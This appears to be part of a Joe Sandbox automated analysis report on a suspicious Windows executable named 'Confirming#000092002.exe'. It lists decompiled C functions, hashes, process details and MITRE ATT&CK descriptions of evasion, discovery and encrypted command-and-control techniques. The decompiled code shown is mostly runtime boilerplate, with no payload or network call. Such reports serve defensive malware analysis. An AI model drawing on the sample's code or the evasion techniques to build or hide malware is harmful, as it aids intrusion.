Opcode Fuzzy Hash: 0f5d760dedf7c278e9a672447b200ef3de977c9f20c4f22bd5dd62dfad0774b2
Instruction Fuzzy Hash: 8911EB36F001559BCB14EAA888426FF72E59F4E754F10605ABB41BF242EA74FD01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00EA4408 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00EA4408(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				char _v0;
				void* _v800;
				int _t7;
				intOrPtr _t12;
				signed int _t13;
				intOrPtr _t16;
				char _t17;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr* _t22;

				_t21 = __esi;
				_t20 = __edi;
				_t19 = __edx;
				_t16 = __ebx;
				_t7 = IsProcessorFeaturePresent(0x17);
				if(_t7 != 0) {
					_t17 = _a4;
					asm("int 0x29");
				}
				 *0xfe2508 = _t7;
				 *0xfe2504 = _t17;
				 *0xfe2500 = _t19;
				 *0xfe24fc = _t16;
				 *0xfe24f8 = _t21;
				 *0xfe24f4 = _t20;
				 *0xfe2520 = ss;
				 *0xfe2514 = cs;
				 *0xfe24f0 = ds;
				 *0xfe24ec = es;
				 *0xfe24e8 = fs;
				 *0xfe24e4 = gs;
				asm("pushfd");
				_pop( *0xfe2518);
				 *0xfe250c =  *_t22;
				_t2 =  &_v0; // 0xea3761
				 *0xfe2510 =  *_t2;
				 *0xfe251c =  &_a4;
				_t12 =  *0xfe2510; // 0x0
				 *0xfe2414 = _t12;
				 *0xfe2408 = 0xc0000409;
				 *0xfe240c = 1;
				 *0xfe2418 = 1;
				_t13 = 4;
				 *((intOrPtr*)(0xfe241c + _t13 * 0)) = _a4;
				return E00EA42DA(0xeb137c);
			}

0x00ea4408
0x00ea4408
0x00ea4408
0x00ea4408
0x00ea4413
0x00ea441b
0x00ea441d
0x00ea4420
0x00ea4420
0x00ea4422
0x00ea4427
0x00ea442d
0x00ea4433
0x00ea4439
0x00ea443f
0x00ea4445
0x00ea444c
0x00ea4453
0x00ea445a
0x00ea4461
0x00ea4468
0x00ea446f
0x00ea4470
0x00ea4479
0x00ea447e
0x00ea4481
0x00ea4489
0x00ea4494
0x00ea4499
0x00ea449e
0x00ea44a8
0x00ea44b2
0x00ea44be
0x00ea44c5
0x00ea44d6

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00EA4413
___raise_securityfailure.LIBCMT ref: 00EA44D0

Strings

a7, xrefs: 00EA447E

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: a7
API String ID: 3761405300-2076148515
Opcode ID: 88105dfb166f8bb154327dcf4e11b35f2027e0a4a7fe4a9071144122a2ef3fe8
Instruction ID: 4e1c090eb71a0b9bc4ab96b3e50c9e178f21381f56761341a25826c9af1a8ac7
Opcode Fuzzy Hash: 88105dfb166f8bb154327dcf4e11b35f2027e0a4a7fe4a9071144122a2ef3fe8
Instruction Fuzzy Hash: 691193B451038CDAD794DF15FED1A443BADBB48300B04A06AE9088F3A2F7B05645AF95

Uniqueness

Uniqueness Score: -1.00%

Function 00EA999F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00EA999F(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				intOrPtr* _t11;

				_t11 = E00EA97BE(0x12, "InitializeCriticalSectionEx", 0xeb2af4, 0xeb2afc);
				if(_t11 == 0) {
					return InitializeCriticalSectionAndSpinCount(_a4, _a8);
				}
				 *0xeb1278(_a4, _a8, _a12);
				return  *_t11();
			}

0x00ea99bb
0x00ea99c2
0x00000000
0x00ea99df
0x00ea99cf
0x00000000

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00EA94F8), ref: 00EA99DF

Strings

InitializeCriticalSectionEx, xrefs: 00EA99AF
"G, xrefs: 00EA99CF

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: "G$InitializeCriticalSectionEx
API String ID: 2593887523-1819412833
Opcode ID: 1f1a57fe3f8ae8bb1cabcdbb6340ad556097b6eda0e0a2518cad7495547768f1
Instruction ID: e31a98991ecb826e97ba5bcef94280378a02612958fe1f3d36afe8dc49d154c5
Opcode Fuzzy Hash: 1f1a57fe3f8ae8bb1cabcdbb6340ad556097b6eda0e0a2518cad7495547768f1
Instruction Fuzzy Hash: 3CE09236540318BBCF222F51CC05CDF3F16DF49770F405225FE1979261DAB18820A6D0

Uniqueness

Uniqueness Score: -1.00%

Function 00EA98A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00EA98A0(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t7;

				_t7 = E00EA97BE(3, "FlsAlloc", 0xeb2ad4, 0xeb2adc);
				if(_t7 == 0) {
					return TlsAlloc();
				}
				 *0xeb1278(_a4);
				return  *_t7();
			}

0x00ea98bc
0x00ea98c3
0x00000000
0x00ea98d4
0x00ea98ca
0x00000000

APIs

TlsAlloc.KERNEL32 ref: 00EA98D4

Strings

FlsAlloc, xrefs: 00EA98B0
"G, xrefs: 00EA98CA

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: Alloc
String ID: "G$FlsAlloc
API String ID: 2773662609-571099555
Opcode ID: 6af87f5cf97ed42e1859d4c9d0e64c35bc26d59fcb98b674e7de0a9c1086dbf8
Instruction ID: fbbce4c6f94b1fb64bc3211587df99232e331b28639c5e47bad863155a86e0e9
Opcode Fuzzy Hash: 6af87f5cf97ed42e1859d4c9d0e64c35bc26d59fcb98b674e7de0a9c1086dbf8
Instruction Fuzzy Hash: DFE0C2316803246B862536A59C169DB7E08CF46BB0B811161FA057A692DAA4584143D1

Uniqueness

Uniqueness Score: -1.00%

Function 00EA3F8E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EA3F8E(intOrPtr* __ecx, void* __eflags) {
				intOrPtr* _t13;

				_t13 = __ecx;
				E00EA3FE1(__ecx);
				 *__ecx = 0x38;
				 *((intOrPtr*)(__ecx + 8)) = 0xea0000;
				 *((intOrPtr*)(__ecx + 4)) = 0xea0000;
				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
				 *((intOrPtr*)(__ecx + 0x10)) = 0xeb12e0;
				if(E00EA10C5(0xea0000, __ecx + 0x14) < 0) {
					if(IsDebuggerPresent() != 0) {
						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
					}
					 *0xfe2df9 = 1;
				}
				return _t13;
			}

0x00ea3f8f
0x00ea3f91
0x00ea3f9b
0x00ea3fa4
0x00ea3fa7
0x00ea3faa
0x00ea3fb1
0x00ea3fbf
0x00ea3fc9
0x00ea3fd0
0x00ea3fd0
0x00ea3fd6
0x00ea3fd6
0x00ea3fe0

APIs

Part of subcall function 00EA10C5: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,?,00EB7488), ref: 00EA10CB
Part of subcall function 00EA10C5: GetLastError.KERNEL32(?,00000000,00000000,?,?,00EB7488), ref: 00EA10D5

IsDebuggerPresent.KERNEL32(?,?,?,00EA106D), ref: 00EA3FC1
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00EA106D), ref: 00EA3FD0

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00EA3FCB

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: ae0208b0e927187094bdf9d320a05f211600230c7899f5b88493b6b9b894a0ac
Instruction ID: 6fec5c2f163145aeee14a05c1cd134b78528769b5ae2a6844e1cd83e1b486e58
Opcode Fuzzy Hash: ae0208b0e927187094bdf9d320a05f211600230c7899f5b88493b6b9b894a0ac
Instruction Fuzzy Hash: B6E0A9347003408FD3249F36E8083837AE1AF0A394F40989DE482EA260E7B0A5488B90

Uniqueness

Uniqueness Score: -1.00%

Function 00EA21F6 Relevance: 5.0, APIs: 4, Instructions: 44
stringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00EA21F6(CHAR* __ecx, short* __edx) {
				CHAR* _t12;
				short* _t13;

				_t12 = __ecx;
				_t13 = __edx;
				if(lstrcmpiA(__ecx, 0xeb5ebc) != 0) {
					if(lstrcmpiA(_t12, 0xeb5ec0) != 0) {
						if(lstrcmpiA(_t12, 0xeb5ec4) != 0) {
							if(lstrcmpiA(_t12, 0xeb5ec8) != 0) {
								 *_t13 = 0;
								return 0;
							}
							_push(0x11);
							L2:
							_pop(0x4008);
							L3:
							 *_t13 = 0x4008;
							return 1;
						}
						_push(0x13);
						goto L2;
					}
					goto L3;
				}
				_push(8);
				goto L2;
			}

0x00ea21ff
0x00ea2201
0x00ea220d
0x00ea2224
0x00ea2237
0x00ea2247
0x00ea224f
0x00000000
0x00ea224f
0x00ea2249
0x00ea2211
0x00ea2211
0x00ea2212
0x00ea2212
0x00000000
0x00ea2217
0x00ea2239
0x00000000
0x00ea2239
0x00000000
0x00ea2226
0x00ea220f
0x00000000

APIs

lstrcmpiA.KERNEL32(?,00EB5EBC,?,00000000,00000000,00EA24CA,?,64E1D101,?,00000000,?,?,?,00EB088D,000000FF), ref: 00EA2209
lstrcmpiA.KERNEL32(?,00EB5EC0,?,00EA3194,?,00000000,?,?,?,?,0002001F), ref: 00EA2220
lstrcmpiA.KERNEL32(?,00EB5EC4,?,00EA3194,?,00000000,?,?,?,?,0002001F), ref: 00EA2233
lstrcmpiA.KERNEL32(?,00EB5EC8,?,00EA3194,?,00000000,?,?,?,?,0002001F), ref: 00EA2243

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 56e07c4e577babeb3f00b9ee7a5b09e8964a58161b145a8ec8304244b656716f
Instruction ID: 9760f773bec9fe7319603ae571696788523bc0bb61cdeaf2d87d39255e85df85
Opcode Fuzzy Hash: 56e07c4e577babeb3f00b9ee7a5b09e8964a58161b145a8ec8304244b656716f
Instruction Fuzzy Hash: AEF08232384703B2D220116D5C91FBB01985F9FB55B20603EF745FA0A0E650FC413235

Uniqueness

Uniqueness Score: -1.00%

Target ID:	1
Start time:	12:34:20
Start date:	24/03/2022
Path:	C:\Users\user\Desktop\Confirming#000092002.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Confirming#000092002.exe"
Imagebase:	0xea0000
File size:	1320960 bytes
MD5 hash:	24A097B3CD1E774E29E6E3E4F5E6522A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Confirming#000092002.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: Confirming#000092002.exePID: 6540, Parent PID: 2372

General

Chronological Activities

Disassembly

Analysis Process: Confirming#000092002.exePID: 6540, Parent PID: 2372COMMON

Execution Graph

Graph

Executed Functions

Function 00EA4AEF Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Control-flow Graph

Function 00EA3A86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108memorywindowsleepCOMMON

Control-flow Graph

Function 00EA7FEA Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Windows Analysis Report
Confirming#000092002.exe

Function 00EA4AEF Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Function 00EA3A86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108
memorywindowsleepCOMMON

Function 00EA7FEA Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Function 00EAB905 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Function 00EA9E27 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Function 00EA3BDD Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Function 00EA1B39 Relevance: 12.2, APIs: 8, Instructions: 166
libraryCOMMON

Function 00EA71A3 Relevance: 6.1, APIs: 4, Instructions: 83
memoryCOMMON

Function 00EA4959 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Function 00EA72E0 Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Function 00EA7B8E Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Function 00EAFA9C Relevance: 1.8, APIs: 1, Instructions: 274
COMMONLIBRARYCODECrypto

Function 00EA4775 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Function 00EAA22B Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Function 00EA14A2 Relevance: 1.5, APIs: 1, Instructions: 35
comCOMMON

Function 00EAB2B8 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Function 00EA9DF6 Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Function 00EA29E8 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 208
memoryCOMMON

Function 00EA2DA0 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 438
stringregistryCOMMON

Function 00EA2440 Relevance: 21.4, APIs: 14, Instructions: 353
COMMON

Function 00EABFF1 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Function 00EA8F8C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 69
COMMON

Function 00EA3402 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 263
COMMON

Function 00EA5570 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 122
COMMON

Function 00EA6111 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Function 00EA3790 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 244
COMMON

Function 00EA96F7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Function 00EABD49 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Function 00EA7C13 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Function 00EAD4C5 Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Function 00EA5DDA Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Function 00EA5EBA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168
COMMONLIBRARYCODE

Function 00EAA6B8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Function 00EA6E42 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Function 00EA1348 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registrylibraryloaderCOMMON

Function 00EA12E5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
registrylibraryloaderCOMMON

Function 00EA1596 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Function 00EAD164 Relevance: 7.7, APIs: 5, Instructions: 199
COMMON

Function 00EA2327 Relevance: 7.6, APIs: 6, Instructions: 117
COMMON

Function 00EABCA8 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Function 00EAA03C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Function 00EA2049 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104
COMMON

Function 00EA1E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103
COMMON

Function 00EA13BB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
libraryloaderCOMMON

Function 00EA9F50 Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Function 00EA1A54 Relevance: 6.1, APIs: 4, Instructions: 77
COMMON

Function 00EA90A4 Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Function 00EA91FB Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Function 00EAF486 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Function 00EA85AB Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Function 00EA7CE5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Function 00EA64B6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Function 00EA2C50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105
stringCOMMON

Function 00EA1DBF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
COMMON

Function 00EA1F97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
COMMON

Function 00EA4408 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
COMMON

Function 00EA999F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26
COMMON

Function 00EA98A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22
memoryCOMMON

Function 00EA3F8E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
COMMON

Function 00EA21F6 Relevance: 5.0, APIs: 4, Instructions: 44
stringCOMMON